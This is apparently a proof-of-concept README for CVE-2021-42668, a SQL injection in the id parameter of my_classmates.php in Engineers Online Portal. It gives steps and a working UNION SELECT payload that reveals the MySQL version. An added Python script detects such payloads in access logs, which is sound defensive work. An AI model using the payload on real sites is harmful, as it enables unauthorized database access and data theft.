CVE-2021-42668 PoC — Engineers Online Portal SQL Injection Vulnerability

Source
Associated Vulnerability
Title: Engineers Online Portal SQL Injection Vulnerability (CVE-2021-42668)
Description: A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability to achieve remote code execution on the remote web server.
Description
CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. 
Readme
# cve-2021-42668
CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. 

# Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "my_classmates.php" web page to manipulate the SQL query the page performs.
As a result, the attacker can extract sensitive data from the web server.

Affected components - 

Vulnerable page - my_classmates.php

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/my_classmates.php
2) Insert your payload in the id parameter

# Proof of concept (PoC) -
The following payload will allow you to extract the MySQL server version running on the web server -
```
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;-- -
```

![CVE-2021-42668](https://user-images.githubusercontent.com/93016131/140190507-39c3361e-6ebd-4eed-9016-e9a6be6bd2db.gif)
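
For defenders, the following added example (not part of the original README or the project's code) scans web server access log lines for requests to `my_classmates.php` whose `id` value carries SQL syntax like the payload above, including layered URL-encoding. It assumes the `id` parameter arrives in the query string and that legitimate ids are integers; the log lines, IP address and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote, unquote_plus

VULN_PAGE = "my_classmates.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Metacharacters and keywords of the kind that appear in the README payload.
SQLI_RE = re.compile(r"'|--|;|/\*|@@|\bunion\b|\bselect\b", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo layered URL-encoding such as %2527 -> %27 -> '."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """None = not a request to the page; else 'ok', 'non-numeric' or 'sqli-pattern'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + VULN_PAGE):
        return None
    verdict = "ok"
    for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
        value = decode_fully(raw)  # parse_qs already decoded one layer
        if SQLI_RE.search(value):
            return "sqli-pattern"
        if not value.isdigit():
            verdict = "non-numeric"  # assumption: legitimate ids are integers
    return verdict

# Constructed sample log (not real traffic). PAYLOAD is the README's string.
PAYLOAD = "' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;-- -"
BASE = "/nia_munoz_monitoring_system/"

def entry(target):
    return f'203.0.113.7 - - [01/Jan/2022:10:15:32 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = [
    entry(BASE + "my_classmates.php?id=12"),                        # normal request
    entry(BASE + "my_classmates.php?id=" + quote(PAYLOAD)),         # URL-encoded once
    entry(BASE + "my_classmates.php?id=" + quote(quote(PAYLOAD))),  # double-encoded
    entry(BASE + "my_classmates.php?id=abc"),                       # malformed id
    entry(BASE + "index.php?id=12"),                                # different page
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line[:90])
```

Access logs normally record only the query string, so a parameter sent in a POST body would not be visible to this check.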

# References - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42668

https://nvd.nist.gov/vuln/detail/CVE-2021-42668

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021. 